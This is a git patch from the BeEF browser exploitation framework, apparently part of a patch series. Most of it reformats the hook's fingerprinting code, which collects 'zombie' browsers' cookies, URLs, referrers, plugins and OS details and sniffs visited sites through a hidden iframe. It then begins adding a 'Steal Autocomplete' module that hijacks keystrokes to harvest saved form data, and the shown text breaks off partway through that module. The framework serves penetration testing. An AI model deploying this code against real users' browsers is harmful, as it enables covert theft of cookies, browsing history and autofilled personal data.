+     * @example: if(beef.browser.hasVBScript()) { ... }
+     */
+    hasVBScript:function () {
+        if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
+            return true;
+        } else {
+            return false;
+        }
+    },
 
-	/**
-	 * Returns the list of plugins installed in the browser.
-	 */
-	getPlugins: function() {
+    /**
+     * Returns the list of plugins installed in the browser.
+     */
+    getPlugins:function () {
 
-		var results;
-		Array.prototype.unique = function() {
-			var o = {}, i, l = this.length, r = [];
-			for(i=0; i<l;i+=1) o[this[i]] = this[i];
-			for(i in o) r.push(o[i]);
-			return r;
-		};
+        var results;
+        Array.prototype.unique = function () {
+            var o = {}, i, l = this.length, r = [];
+            for (i = 0; i < l; i += 1) o[this[i]] = this[i];
+            for (i in o) r.push(o[i]);
+            return r;
+        };
 
-		// Internet Explorer
-		if (this.isIE()) this.getPluginsIE();
+        // Internet Explorer
+        if (this.isIE()) this.getPluginsIE();
 
-		// All other browsers that support navigator.plugins
-		else if (navigator.plugins && navigator.plugins.length > 0) {
-			results = new Array();
-			for (var i=0; i < navigator.plugins.length; i++) {
+        // All other browsers that support navigator.plugins
+        else if (navigator.plugins && navigator.plugins.length > 0) {
+            results = new Array();
+            for (var i = 0; i < navigator.plugins.length; i++) {
 
-				// Firefox returns exact plugin versions
-				if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
+                // Firefox returns exact plugin versions
+                if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
 
-				// Webkit and Presto (Opera)
-				// Don't support the version attribute
-				// Sometimes store the version in description (Real, Adobe)
-				else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
-			}
-			results = results.unique().toString();
+                // Webkit and Presto (Opera)
+                // Don't support the version attribute
+                // Sometimes store the version in description (Real, Adobe)
+                else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
+            }
+            results = results.unique().toString();
 
-		// All browsers that don't support navigator.plugins
-		} else results = 'navigator.plugins is not supported in this browser!';
+            // All browsers that don't support navigator.plugins
+        } else {
+            results = new Array();
+            //firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726
+            // On linux sistem the "version" slot is empty so I'll attach "description" after version
+            var plugins = {
 
-		// Return results
-		return results;
-	},
+                'AdobeAcrobat':{
+                    'control':'Adobe Acrobat',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["Adobe Acrobat"]["description"];
+                            return 'Adobe Acrobat Version  ' + version; //+ " description "+ filename;
 
-	/**
-	 * Returns a list of plugins detected by IE. This is a hack because IE doesn't
-	 * support navigator.plugins
-	 */
-     getPluginsIE: function() {
+                        }
+                        catch (e) {
+                        }
+
+
+                    }},
+                'Flash':{
+                    'control':'Shockwave Flash',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["Shockwave Flash"]["description"];
+                            return 'Flash Player Version ' + version; //+ " description "+ filename;
+                        }
+
+                        catch (e) {
+                        }
+                    }},
+                'Google_Talk_Plugin_Accelerator':{
+                    'control':'Google Talk Plugin Video Accelerator',
+                    'return':function (control) {
+
+                        try {
+                            version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"];
+                            return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Google_Talk_Plugin':{
+                    'control':'Google Talk Plugin',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins['Google Talk Plugin']["description"];
+                            return 'Google Talk Plugin Version ' + version;// " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Facebook_Video_Calling_Plugin':{
+                    'control':'Facebook Video Calling Plugin',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["Facebook Video Calling Plugin"]["description"];
+                            return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Google_Update':{
+                    'control':'Google Update',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["Google Update"]["description"];
+                            return 'Google Update Version ' + version//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Windows_Activation_Technologies':{
+                    'control':'Windows Activation Technologies',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["Windows Activation Technologies"]["description"];
+                            return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+
+                    }},
+                'VLC_Web_Plugin':{
+                    'control':'VLC Web Plugin',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins["VLC Web Plugin"]["description"];
+                            return 'VLC Web Plugin Version ' + version;//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Google_Earth_Plugin':{
+                    'control':'Google Earth Plugin',
+
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins['Google Earth Plugin']["description"];
+                            return 'Google Earth Plugin Version ' + version;//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }},
+                'Silverlight_Plug-In':{
+                    'control':'Silverlight Plug-In',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins['Silverlight Plug-In']["description"];
+                            return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename;
+                        }
+                        catch (e) {
+                        }
+                    }}
+            };
+
+            var c = 0;
+            for (var i in plugins) {
+                //each element od plugins
+                var control = plugins[i]['control'];
+                try {
+                    var version = plugins[i]['return'](control);
+                    if (version) {
+                        results[c] = version;
+                        c = c + 1;
+                    }
+                }
+                catch (e) {
+                }
+
+            }
+        }
+        // Return results
+        return results;
+    },
+
+    /**
+     * Returns a list of plugins detected by IE. This is a hack because IE doesn't
+     * support navigator.plugins
+     */
+    getPluginsIE:function () {
         var results = '';
         var plugins = {'AdobePDF6':{
             'control':'PDF.PdfCtrl',
-            'return': function(control) {
+            'return':function (control) {
                 version = control.getVersions().split(',');
                 version = version[0].split('=');
-                return 'Acrobat Reader v'+parseFloat(version[1]);
+                return 'Acrobat Reader v' + parseFloat(version[1]);
             }},
             'AdobePDF7':{
-            'control':'AcroPDF.PDF',
-            'return': function(control) {
-                version = control.getVersions().split(',');
-                version = version[0].split('=');
-                return 'Acrobat Reader v'+parseFloat(version[1]);
-            }},
+                'control':'AcroPDF.PDF',
+                'return':function (control) {
+                    version = control.getVersions().split(',');
+                    version = version[0].split('=');
+                    return 'Acrobat Reader v' + parseFloat(version[1]);
+                }},
             'Flash':{
-            'control':'ShockwaveFlash.ShockwaveFlash',
-            'return': function(control) {
-                version = control.getVariable('$version').substring(4);
-                return 'Flash Player v'+version.replace(/,/g, ".");
-            }},
+                'control':'ShockwaveFlash.ShockwaveFlash',
+                'return':function (control) {
+                    version = control.getVariable('$version').substring(4);
+                    return 'Flash Player v' + version.replace(/,/g, ".");
+                }},
             'Quicktime':{
-            'control': 'QuickTime.QuickTime',
-            'return': function(control) {
-                return 'QuickTime Player';
-            }},
+                'control':'QuickTime.QuickTime',
+                'return':function (control) {
+                    return 'QuickTime Player';
+                }},
             'RealPlayer':{
-            'control': 'RealPlayer',
-            'return': function(control) {
-                version = control.getVersionInfo();
-                return 'RealPlayer v'+parseFloat(version);
-            }},
+                'control':'RealPlayer',
+                'return':function (control) {
+                    version = control.getVersionInfo();
+                    return 'RealPlayer v' + parseFloat(version);
+                }},
             'Shockwave':{
-            'control': 'SWCtl.SWCtl',
-            'return': function(control) {
-                version = control.ShockwaveVersion('').split('r');
-                return 'Shockwave v'+parseFloat(version[0]);
-            }},
-            'WindowsMediaPlayer': {
-            'control': 'WMPlayer.OCX',
-            'return': function(control) {
-                return 'Windows Media Player v'+parseFloat(control.versionInfo);
-            }}
-            };
+                'control':'SWCtl.SWCtl',
+                'return':function (control) {
+                    version = control.ShockwaveVersion('').split('r');
+                    return 'Shockwave v' + parseFloat(version[0]);
+                }},
+            'WindowsMediaPlayer':{
+                'control':'WMPlayer.OCX',
+                'return':function (control) {
+                    return 'Windows Media Player v' + parseFloat(control.versionInfo);
+                }}
+        };
         if (window.ActiveXObject) {
             var j = 0;
-            for (var i in plugins)
-            {
+            for (var i in plugins) {
                 var control = null;
                 var version = null;
                 try {
                     control = new ActiveXObject(plugins[i]['control']);
-                } catch (e) { }
-                if (control)
-                {
+                } catch (e) {
+                }
+                if (control) {
                     if (j != 0)
                         results += ', ';
                     results += plugins[i]['return'](control);
@@ -959,324 +2005,320 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
         return results;
     },
 
-	/**
-	 * Returns zombie screen size and color depth.
-	 */
-	getScreenSize: function() {
-		return {
-			width: window.screen.width,
-			height: window.screen.height,
-			colordepth: window.screen.colorDepth
-			}
-	},
+    /**
+     * Returns zombie screen size and color depth.
+     */
+    getScreenSize:function () {
+        return {
+            width:window.screen.width,
+            height:window.screen.height,
+            colordepth:window.screen.colorDepth
+        }
+    },
 
-	/**
-	 * Returns zombie browser window size.
-	 * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
-	 */
-	getWindowSize: function() {
-		  var myWidth = 0, myHeight = 0;
-		  if( typeof( window.innerWidth ) == 'number' ) {
-		    // Non-IE
-		    myWidth = window.innerWidth;
-		    myHeight = window.innerHeight;
-		  } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
-		    // IE 6+ in 'standards compliant mode'
-		    myWidth = document.documentElement.clientWidth;
-		    myHeight = document.documentElement.clientHeight;
-		  } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
-		    // IE 4 compatible
-		    myWidth = document.body.clientWidth;
-		    myHeight = document.body.clientHeight;
-		  }
-		  return {
-			  width: myWidth,
-			  height: myHeight
-		  }
-	},
+    /**
+     * Returns zombie browser window size.
+     * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
+     */
+    getWindowSize:function () {
+        var myWidth = 0, myHeight = 0;
+        if (typeof( window.innerWidth ) == 'number') {
+            // Non-IE
+            myWidth = window.innerWidth;
+            myHeight = window.innerHeight;
+        } else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) {
+            // IE 6+ in 'standards compliant mode'
+            myWidth = document.documentElement.clientWidth;
+            myHeight = document.documentElement.clientHeight;
+        } else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) {
+            // IE 4 compatible
+            myWidth = document.body.clientWidth;
+            myHeight = document.body.clientHeight;
+        }
+        return {
+            width:myWidth,
+            height:myHeight
+        }
+    },
 
-	/**
-	 * Construct hash from browser details. This function is used to grab the browser details during the hooking process
-	 */
-	getDetails: function() {
-		var details = new Array();
+    /**
+     * Construct hash from browser details. This function is used to grab the browser details during the hooking process
+     */
+    getDetails:function () {
+        var details = new Array();
 
-		var browser_name = beef.browser.getBrowserName();
-		var browser_version = beef.browser.getBrowserVersion();
-		var browser_reported_name = beef.browser.getBrowserReportedName();
-		var cookies = document.cookie;
-		var page_title = (document.title) ? document.title : "Unknown";
-		var page_uri = document.location.href;
-		var page_referrer = (document.referrer) ? document.referrer : "Unknown";
-		var hostname = document.location.hostname;
-		var hostport = (document.location.port)? document.location.port : "80";
-		var browser_plugins = beef.browser.getPlugins();
-		var date_stamp = new Date().toString();
-		var os_name = beef.os.getName();
-		var hw_name = beef.hardware.getName();
-		var cpu_type = beef.hardware.cpuType();
-		var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
-		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
-		var screen_size = beef.browser.getScreenSize();
-		var window_size = beef.browser.getWindowSize();
-		var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
-		var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
-		var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
-		var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
-		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
-		var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
-		var has_activex = (beef.browser.hasActiveX())? "Yes":"No";
-		var has_silverlight = (beef.browser.hasSilverlight())? "Yes":"No";
-		var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie"))? "Yes":"No";
-		var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie"))? "Yes":"No";
+        var browser_name = beef.browser.getBrowserName();
+        var browser_version = beef.browser.getBrowserVersion();
+        var browser_reported_name = beef.browser.getBrowserReportedName();
+        var cookies = document.cookie;
+        var page_title = (document.title) ? document.title : "Unknown";
+        var page_uri = document.location.href;
+        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
+        var hostname = document.location.hostname;
+        var hostport = (document.location.port) ? document.location.port : "80";
+        var browser_plugins = beef.browser.getPlugins();
+        var date_stamp = new Date().toString();
+        var os_name = beef.os.getName();
+        var hw_name = beef.hardware.getName();
+        var cpu_type = beef.hardware.cpuType();
+        var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
+        var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
+            if (value == true) return value; else if (typeof value == 'object') return value; else return;
+        });
+        var screen_size = beef.browser.getScreenSize();
+        var window_size = beef.browser.getWindowSize();
+        var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
+        var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
+        var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
+        var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
+        var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
+        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
+        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
+        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
+        var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
+        var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
 
-		if(browser_name) details["BrowserName"] = browser_name;
-		if(browser_version) details["BrowserVersion"] = browser_version;
-		if(browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
-		if(cookies) details["Cookies"] = cookies;
-		if(page_title) details["PageTitle"] = page_title;
-		if(page_uri) details["PageURI"] = page_uri;
-		if(page_referrer) details["PageReferrer"] = page_referrer;
-		if(hostname) details["HostName"] = hostname;
-		if(hostport) details["HostPort"] = hostport;
-		if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
-		if(os_name) details['OsName'] = os_name;
-		if(hw_name) details['Hardware'] = hw_name;
-		if(cpu_type) details['CPU'] = cpu_type;
-		if(date_stamp) details['DateStamp'] = date_stamp;
-		if(browser_platform) details['BrowserPlatform'] = browser_platform;
-		if(browser_type) details['BrowserType'] = browser_type;
-		if(screen_size) details['ScreenSize'] = screen_size;
-		if(window_size) details['WindowSize'] = window_size;
-		if(java_enabled) details['JavaEnabled'] = java_enabled;
-		if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
-		if(has_flash) details['HasFlash'] = has_flash
-		if(has_phonegap) details['HasPhonegap'] = has_phonegap
-		if(has_web_socket) details['HasWebSocket'] = has_web_socket
-		if(has_googlegears) details['HasGoogleGears'] = has_googlegears
-		if(has_activex) details['HasActiveX'] = has_activex;
-		if(has_silverlight) details['HasSilverlight'] = has_silverlight;
-		if(has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
-		if(has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+        if (browser_name) details["BrowserName"] = browser_name;
+        if (browser_version) details["BrowserVersion"] = browser_version;
+        if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
+        if (cookies) details["Cookies"] = cookies;
+        if (page_title) details["PageTitle"] = page_title;
+        if (page_uri) details["PageURI"] = page_uri;
+        if (page_referrer) details["PageReferrer"] = page_referrer;
+        if (hostname) details["HostName"] = hostname;
+        if (hostport) details["HostPort"] = hostport;
+        if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
+        if (os_name) details['OsName'] = os_name;
+        if (hw_name) details['Hardware'] = hw_name;
+        if (cpu_type) details['CPU'] = cpu_type;
+        if (date_stamp) details['DateStamp'] = date_stamp;
+        if (browser_platform) details['BrowserPlatform'] = browser_platform;
+        if (browser_type) details['BrowserType'] = browser_type;
+        if (screen_size) details['ScreenSize'] = screen_size;
+        if (window_size) details['WindowSize'] = window_size;
+        if (java_enabled) details['JavaEnabled'] = java_enabled;
+        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
+        if (has_flash) details['HasFlash'] = has_flash
+        if (has_phonegap) details['HasPhonegap'] = has_phonegap
+        if (has_web_socket) details['HasWebSocket'] = has_web_socket
+        if (has_googlegears) details['HasGoogleGears'] = has_googlegears
+        if (has_activex) details['HasActiveX'] = has_activex;
+        if (has_silverlight) details['HasSilverlight'] = has_silverlight;
+        if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
+        if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
 
-		return details;
-	},
+        return details;
+    },
 
-	/**
-	 * Returns boolean value depending on whether the browser supports ActiveX
-	 */
-	hasActiveX: function() {
-		return !!window.ActiveXObject;
-	},
+    /**
+     * Returns boolean value depending on whether the browser supports ActiveX
+     */
+    hasActiveX:function () {
+        return !!window.ActiveXObject;
+    },
 
-	/**
-	 * Returns boolean value depending on whether the browser supports Silverlight
-	 */
-	hasSilverlight: function() {
-		var result = false;
+    /**
+     * Returns boolean value depending on whether the browser supports Silverlight
+     */
+    hasSilverlight:function () {
+        var result = false;
 
-		try {
-			if (beef.browser.isIE()) {
-				var slControl = new ActiveXObject('AgControl.AgControl');
-				result = true;
-			} else if (navigator.plugins["Silverlight Plug-In"]) {
-				result = true;
-			}
-		} catch (e) {
-			result = false;
-		}
+        try {
+            if (beef.browser.isIE()) {
+                var slControl = new ActiveXObject('AgControl.AgControl');
+                result = true;
+            } else if (navigator.plugins["Silverlight Plug-In"]) {
+                result = true;
+            }
+        } catch (e) {
+            result = false;
+        }
 
-		return result;
-	},
+        return result;
+    },
 
-	/**
-	 * Returns array of results, whether or not the target zombie has visited the specified URL
-	 */
-	hasVisited: function(urls) {
-		var results = new Array();
-		var iframe = beef.dom.createInvisibleIframe();
-		var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
-		ifdoc.open();
-		ifdoc.write('<style>a:visited{width:0px !important;}</style>');
-		ifdoc.close();
-		urls = urls.split("\n");
-		var count = 0;
-		for (var i in urls)
-		{
-			var u = urls[i];
-			if (u != "" || u != null)
-			{
-				var success = false;
-				var a = ifdoc.createElement('a');
-				a.href = u;
-				ifdoc.body.appendChild(a);
-				var width = null;
-				(a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
-				if (width == '0px') {
-					success = true;
-				}
-				results.push({'url':u, 'visited':success});
-				count++;
-			}
-		}
-		beef.dom.removeElement(iframe);
-		if (results.length == 0)
-		{
-			return false;
-		}
-		return results;
-	},
+    /**
+     * Returns array of results, whether or not the target zombie has visited the specified URL
+     */
+    hasVisited:function (urls) {
+        var results = new Array();
+        var iframe = beef.dom.createInvisibleIframe();
+        var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
+        ifdoc.open();
+        ifdoc.write('<style>a:visited{width:0px !important;}</style>');
+        ifdoc.close();
+        urls = urls.split("\n");
+        var count = 0;
+        for (var i in urls) {
+            var u = urls[i];
+            if (u != "" || u != null) {
+                var success = false;
+                var a = ifdoc.createElement('a');
+                a.href = u;
+                ifdoc.body.appendChild(a);
+                var width = null;
+                (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
+                if (width == '0px') {
+                    success = true;
+                }
+                results.push({'url':u, 'visited':success});
+                count++;
+            }
+        }
+        beef.dom.removeElement(iframe);
+        if (results.length == 0) {
+            return false;
+        }
+        return results;
+    },
 
-	/**
-	 * Checks if the zombie has Web Sockets enabled.
-	 * @return: {Boolean} true or false.
-	 * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
-	 * */
-	hasWebSocket: function() {
-		return !!window.WebSocket || !!window.MozWebSocket;
-	},
+    /**
+     * Checks if the zombie has Web Sockets enabled.
+     * @return: {Boolean} true or false.
+     * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
+     * */
+    hasWebSocket:function () {
+        return !!window.WebSocket || !!window.MozWebSocket;
+    },
 
-	/**
-	 * Checks if the zombie has Google Gears installed.
-	 * @return: {Boolean} true or false.
-	 *
-	 * @from: https://code.google.com/apis/gears/gears_init.js
-	 * */
-	hasGoogleGears: function() {
+    /**
+     * Checks if the zombie has Google Gears installed.
+     * @return: {Boolean} true or false.
+     *
+     * @from: https://code.google.com/apis/gears/gears_init.js
+     * */
+    hasGoogleGears:function () {
 
-		var ggfactory = null;
+        var ggfactory = null;
 
-		// Chrome
-		if (window.google && google.gears) return true;
+        // Chrome
+        if (window.google && google.gears) return true;
 
-		// Firefox
-		if (typeof GearsFactory != 'undefined') {
-			ggfactory = new GearsFactory();
-		} else {
-			// IE
-			try {
-				ggfactory = new ActiveXObject('Gears.Factory');
-				// IE Mobile on WinCE.
-				if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
-					ggfactory.privateSetGlobalObject(this);
-				}
-			} catch (e) {
-				// Safari
-				if ((typeof navigator.mimeTypes != 'undefined')
-						&& navigator.mimeTypes["application/x-googlegears"]) {
-					ggfactory = document.createElement("object");
-					ggfactory.style.display = "none";
-					ggfactory.width = 0;
-					ggfactory.height = 0;
-					ggfactory.type = "application/x-googlegears";
-					document.documentElement.appendChild(ggfactory);
-					if(ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
-				}
-			}
-		}
-		if (!ggfactory) return false; else return true;
-	},
+        // Firefox
+        if (typeof GearsFactory != 'undefined') {
+            ggfactory = new GearsFactory();
+        } else {
+            // IE
+            try {
+                ggfactory = new ActiveXObject('Gears.Factory');
+                // IE Mobile on WinCE.
+                if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
+                    ggfactory.privateSetGlobalObject(this);
+                }
+            } catch (e) {
+                // Safari
+                if ((typeof navigator.mimeTypes != 'undefined')
+                    && navigator.mimeTypes["application/x-googlegears"]) {
+                    ggfactory = document.createElement("object");
+                    ggfactory.style.display = "none";
+                    ggfactory.width = 0;
+                    ggfactory.height = 0;
+                    ggfactory.type = "application/x-googlegears";
+                    document.documentElement.appendChild(ggfactory);
+                    if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
+                }
+            }
+        }
+        if (!ggfactory) return false; else return true;
+    },
 
-	/**
-	 * Dynamically changes the favicon: works in Firefox, Chrome and Opera
-	 **/
-	changeFavicon: function(favicon_url) {
-		var iframe = null;
-		if (this.isC()) {
-			iframe = document.createElement('iframe');
-			iframe.src = 'about:blank';
-			iframe.style.display = 'none';
-			document.body.appendChild(iframe);
-		}
-		var link = document.createElement('link'),
-		oldLink = document.getElementById('dynamic-favicon');
-		link.id = 'dynamic-favicon';
-		link.rel = 'shortcut icon';
-		link.href = favicon_url;
-		if (oldLink) document.head.removeChild(oldLink);
-		document.head.appendChild(link);
-		if (this.isC()) iframe.src += '';
-	},
+    /**
+     * Dynamically changes the favicon: works in Firefox, Chrome and Opera
+     **/
+    changeFavicon:function (favicon_url) {
+        var iframe = null;
+        if (this.isC()) {
+            iframe = document.createElement('iframe');
+            iframe.src = 'about:blank';
+            iframe.style.display = 'none';
+            document.body.appendChild(iframe);
+        }
+        var link = document.createElement('link'),
+            oldLink = document.getElementById('dynamic-favicon');
+        link.id = 'dynamic-favicon';
+        link.rel = 'shortcut icon';
+        link.href = favicon_url;
+        if (oldLink) document.head.removeChild(oldLink);
+        document.head.appendChild(link);
+        if (this.isC()) iframe.src += '';
+    },
 
-	/**
-	 * Changes page title
-	 **/
-	changePageTitle: function(title) {
-		document.title = title;
-	},
+    /**
+     * Changes page title
+     **/
+    changePageTitle:function (title) {
+        document.title = title;
+    },
 
-	/**
-	 *  A function that gets the max number of simultaneous connections the
-	 *  browser can make per domain, or globally on all domains.
-	 *
-	 *  This code is based on research from browserspy.dk
-	 *
-	 * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
-	 * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes
-	 *	the number of connections to the callback function as "this"
-	 *
-	 *	example usage:
-	 *		$j.when(getMaxConnections()).done(function(){
-	 *			console.debug("Max Connections: " + this);
-	 *			});
-	 *
-	 */
-	getMaxConnections: function(scope) {
+    /**
+     *  A function that gets the max number of simultaneous connections the
+     *  browser can make per domain, or globally on all domains.
+     *
+     *  This code is based on research from browserspy.dk
+     *
+     * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
+     * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes
+     *    the number of connections to the callback function as "this"
+     *
+     *    example usage:
+     *        $j.when(getMaxConnections()).done(function(){
+     *            console.debug("Max Connections: " + this);
+     *            });
+     *
+     */
+    getMaxConnections:function (scope) {
 
-		var imagesCount = 30;		// Max number of images to test
-		var secondsTimeout = 5;		// Image load timeout threashold
-		var testUrl ="";		// The image testing service URL
+        var imagesCount = 30;		// Max number of images to test
+        var secondsTimeout = 5;		// Image load timeout threashold
+        var testUrl = "";		// The image testing service URL
 
-		// User broserspy.dk max connections service URL.
-		if(scope=='PER_DOMAIN')
-			 testUrl = "http://browserspy.dk/connections.php?img=1&amp;random=";
-		else
-			// The token will be replaced by a different number with each request(different domain).
-			testUrl = "http://<token>.browserspy.dk/connections.php?img=1&amp;random=";
+        // User broserspy.dk max connections service URL.
+        if (scope == 'PER_DOMAIN')
+            testUrl = "http://browserspy.dk/connections.php?img=1&amp;random=";
+        else
+        // The token will be replaced by a different number with each request(different domain).
+            testUrl = "http://<token>.browserspy.dk/connections.php?img=1&amp;random=";
 
 
-		var imagesLoaded = 0;			// Number of responding images before timeout.
-		var imagesRequested = 0;		// Number of requested images.
-		var testImages = new Array();		// Array of all images.
-		var deferredObject = $j.Deferred();	// A jquery Deferred object.
+        var imagesLoaded = 0;			// Number of responding images before timeout.
+        var imagesRequested = 0;		// Number of requested images.
+        var testImages = new Array();		// Array of all images.
+        var deferredObject = $j.Deferred();	// A jquery Deferred object.
 
-		for (var i = 1; i <= imagesCount; i++)
-		{
-			// Asynchronously request image.
-			testImages[i] =
-				$j.ajax({
-					type: "get",
-					dataType: true,
-					url: (testUrl.replace("<token>",i)) + Math.random(),
-					data: "",
-					timeout: (secondsTimeout * 1000),
+        for (var i = 1; i <= imagesCount; i++) {
+            // Asynchronously request image.
+            testImages[i] =
+                $j.ajax({
+                    type:"get",
+                    dataType:true,
+                    url:(testUrl.replace("<token>", i)) + Math.random(),
+                    data:"",
+                    timeout:(secondsTimeout * 1000),
 
-					// Function on completion of request.
-					complete: function(jqXHR, textStatus){
+                    // Function on completion of request.
+                    complete:function (jqXHR, textStatus) {
 
-						imagesRequested++;
+                        imagesRequested++;
 
-						// If the image returns a 200 or a 302, the text Status is "error", else null
-						if(textStatus == "error")
-						{
-							imagesLoaded++;
-						}
+                        // If the image returns a 200 or a 302, the text Status is "error", else null
+                        if (textStatus == "error") {
+                            imagesLoaded++;
+                        }
 
-						// If all images requested
-						if(imagesRequested >= imagesCount)
-						{
-							// resolve the deferred object passing the number of loaded images.
-							deferredObject.resolveWith(imagesLoaded);
-						}
-					 }
-				});
+                        // If all images requested
+                        if (imagesRequested >= imagesCount) {
+                            // resolve the deferred object passing the number of loaded images.
+                            deferredObject.resolveWith(imagesLoaded);
+                        }
+                    }
+                });
 
-		}
+        }
 
-		// Return a promise to resolve the deffered object when the images are loaded.
-		return deferredObject.promise();
+        // Return a promise to resolve the deffered object when the images are loaded.
+        return deferredObject.promise();
 
-	}
+    }
 
 };
 

From 19d1827c362f48561fc3756dc9aa8ca880c2140d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 08:51:04 +1030
Subject: [PATCH 192/397] Add 'Steal Autocomplete' module

Part of issue #601
---
 .../autocomplete_theft/command.js             | 75 +++++++++++++++++++
 .../autocomplete_theft/config.yaml            | 16 ++++
 .../autocomplete_theft/module.rb              | 49 ++++++++++++
 3 files changed, 140 insertions(+)
 create mode 100644 modules/social_engineering/autocomplete_theft/command.js
 create mode 100644 modules/social_engineering/autocomplete_theft/config.yaml
 create mode 100644 modules/social_engineering/autocomplete_theft/module.rb

diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
new file mode 100644
index 000000000..ffcb1677c
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	steal_autocomplete = function() {
+
+		var results = [];
+
+		// hijack keys and set focus
+		get_autocomplete = function (){
+			window.addEventListener("keydown",function(e){
+				switch(e.keyCode) {
+					case 37: // left
+						scrollTo(window.pageXOffset-20, window.pageYOffset);
+					break;
+					case 38: // up
+						scrollTo(window.pageXOffset, window.pageYOffset-20);
+					break;
+					case 39: // right
+						scrollTo(window.pageXOffset+20, window.pageYOffset);
+					break;
+					case 40: // down
+						scrollTo(window.pageXOffset, window.pageYOffset+20);
+					break;
+					default:break;
+				}
+			},false);
+			document.getElementById("placeholder").focus();
